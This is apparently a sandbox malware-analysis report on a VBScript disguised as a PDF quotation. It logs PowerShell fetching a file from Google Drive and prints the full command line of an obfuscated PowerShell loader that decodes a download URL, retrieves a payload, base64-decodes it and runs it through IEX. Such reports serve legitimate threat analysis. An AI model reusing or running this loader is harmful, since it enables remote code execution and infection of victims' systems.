                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-m1khy1mwy_ucdbSdVUwi0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.957687142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:59:56 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:56 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:56 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-7SlKjJcVn7dBQ0eO8o0wIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.957688142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 08:00:01 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 08:00:01 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 08:00:01 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-kYqepcrvLIGA3m4yI5933g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.957689142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 08:00:06 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 08:00:06 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 08:00:06 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Pv6J5tsEOkCknrObQT3-HQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:03:57:59
                                  Start date:30/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
                                  Imagebase:0x7ff605190000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:03:58:02
                                  Start date:30/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCIndeT.ar ottKomiC nf aiDraaa ob ckiAcilUnniTartUnfyske, no$RatP crrPraoOffsD etKvah anoKondBaaosprnstitOphi occ msAlt) ed ';$Prosthodontics=$Dutiable;Trolddomskunsternes (Fabrikskomplekserne 'Mil$Oveg BalHngoFotbPrma oL Pr:,acs stI .hdCouOundN snIMa a B sH,u= En( CotHjuesttsUnsTExi-KispRaaaCout skHRag Ebu$,omP ierK.io HusLant enHT kOTredD rO Brnsk,TAutIUn c PasHa,) Re ');while (!$sidonias) {Trolddomskunsternes (Fabrikskomplekserne ' K $Gafghkels ioPolbIntasinl.el:El U Dossvrl stiTign TigEtheMk,nUn s Kl=To $stot erM au sye Af ') ;Trolddomskunsternes $Bufferkapaciteterne;Trolddomskunsternes (Fabrikskomplekserne 'V lssoat MiaMatrBettf,j-WatsNislsike svePlepFas Epi4Chi ');Trolddomskunsternes (Fabrikskomplekserne 'F g$P.rgC llGaloHarb C.aItal Fo: G.sBloiHypd aso A,n,tai Nua OvsDem=Clu( ,rTD teAn seartFll-WogPId,aUndtn th su Ild$UnsPCl rBetosprsMyttslah o,oLordUbeoKupnGrotO eiKo cTrisG i)Kah ') ;Trolddomskunsternes (Fabrikskomplekserne 'squ$Audg EilB.aoBorbFesaIn lFac: coOs.rrAf tDewhP ro MacKape dsrE.ta FltKeliIsotErki llc ro= k$ U gse l s os jb osa llBow: UnU Kanra dWeaeBharslucTrarundoPlasVissZoni PsnMedgjus+Bi,+ Al% yp$B sP esrHareForiEvim ncpOpsostar Retdat.HvicDrno FiuI pnReotRec ') ;$Certifiability=$Preimport[$Orthoceratitic];}$Vejlenser=275493;$Cirkelines=30624;Trolddomskunsternes (Fabrikskomplekserne 'For$ FegtimlBraoKilbGolaOlalTo.:s nM ElaCorsHelsOveeWeitsm eOver PriFascpep Tra=Epi AnGRapesemtMus-HovCMauoho,nRevt steVinnAcatMel B r$tykPQu,r.haoBlusB at Rah CyoFlidsuioPron hltO,ei stc isLyk ');Trolddomskunsternes (Fabrikskomplekserne 'Ine$AlagGtel,enoHygb MraNeglClo:CanIdiansolfTr i PrnChaisrktUn.aBehtAfseP ad su l=N g ,jl[Be s,awyChisTuntsl,eNydm sp. ArCvero usnNonvFuteA.erAt tper]ski:Vej:TofFLetrKomoPremVarBEntaUdtsElseFes6 lu4 B sstitcsnrfugistrnsvegDri(Fra$UnsMKisaTassTo.sBraeWhatNyaes.orMusi ascVer) Bo ');Trolddomskunsternes (Fabrikskomplekserne ' dr$BefgsvilHeao ocb p.aBealZi :Un MR ko HyncesiUn s,ontPeli Fos R kOl e .v D g=dor Xip[UdhsV zyGuasB ktPhyeRapmObj.st TFo,e Rux tetGra. MoEMisn Glcstao ldD ni stnFusgbor]ent:kom: emAn nsBasCHe It aIGon. G,GItae sttAl,sburtJusr M.iUdsns mg e( As$ aIK in opfBini.efnsemiflet EfaUndt laesmud.in) Dr ');Trolddomskunsternes (Fabrikskomplekserne 'Brb$D,igB nlPreoHurb,oraRealUni: rTAngrTrao K,u Mev,oie rluPyrrGarsodi1 In5Me,6,ct=sol$AllMB yo O n I i.yrss otNseibagsAp.kopbeMoo. ndsAp usaubin sDiatVanr BoiHosnTe.gAfr(Cra$ProVsyne OdjKonlHjee.ilnDe sToge Norsat,afh$damC W iGe r Miksoge L lGauiBranjobeIn s as)Pen ');Trolddomskunsternes $Trouveurs156;"
                                  Imagebase:0x7ff760310000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:3
                                  Start time:03:58:02
                                  Start date:30/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Executed Functions

                                    Function 00007FF886F74479 Relevance: 1.8, Strings: 1, Instructions: 523COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: UAWA
                                    • API String ID: 0-1492024814
                                    • Opcode ID: 974232fb0fee142f105286e790c3b3052715284214b7086769dff2bcdf4a882a
                                    • Instruction ID: 8067bd78fab202812346d518638eb4aaea61dc8ada8cafc57646d93028dbd9d6
                                    • Opcode Fuzzy Hash: 974232fb0fee142f105286e790c3b3052715284214b7086769dff2bcdf4a882a
                                    • Instruction Fuzzy Hash: 99F1C162E0DECA0FE39696A858552B57BE1FF563A0B0901FED04DC71E3E918AC06C352
                                    Function 00007FF886F76F1A Relevance: .5, Instructions: 463COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ba4151a5cb0ff3edb79fe70bb7825de9fc52e4e7bb6f776b89f35337405a5ce
                                    • Instruction ID: 61325ced2371a6c275d9a04d819a401122ca942b249b9e7ce843bfea45b8352d
                                    • Opcode Fuzzy Hash: 5ba4151a5cb0ff3edb79fe70bb7825de9fc52e4e7bb6f776b89f35337405a5ce
                                    • Instruction Fuzzy Hash: 8DE11321E2EECE4FE7A5AB6848159B5BBA1FF153A0B1801FED14DC7193DA19EC05C342
                                    Function 00007FF886F74604 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1a77e1845e63a33edc3d45a10a48a97149954f133a6e9ddc25bc7b6d3156ea8
                                    • Instruction ID: cc552d6cdfd1444b0f509ff8fc0b74d98796ef9ffd64e58775b926af2ec23822
                                    • Opcode Fuzzy Hash: e1a77e1845e63a33edc3d45a10a48a97149954f133a6e9ddc25bc7b6d3156ea8
                                    • Instruction Fuzzy Hash: 51210422E1DECE4BF3A996A81C55274E6D2FF973B0B9801BAD10CC31D2ED18EC05C602
                                    Function 00007FF886F719AF Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d2b2877f3b3fd90174bc34b8a51495ff0726da8c9cde8b941bf0bd7bb8a3a849
                                    • Instruction ID: c6f2768aa399d80802742f15ab0873fab5df48aae9aefd9d9bfa8c2b618de66c
                                    • Opcode Fuzzy Hash: d2b2877f3b3fd90174bc34b8a51495ff0726da8c9cde8b941bf0bd7bb8a3a849
                                    • Instruction Fuzzy Hash: BC21BF66E0EAC91FF351E62818551B52AE1BF666A0B0800FEE089C71E7DD089C0EC312
                                    Function 00007FF886EA41E5 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638555492.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                    • Instruction ID: 0b8cf5a8a580cb41ac4e944373a343cee0b316a6b9801bd6ca53929c1fc96192
                                    • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                    • Instruction Fuzzy Hash: 0701A73111CB0C8FD744EF0CE451AB5B3E0FB95360F10052EE58AC3651D636E882CB42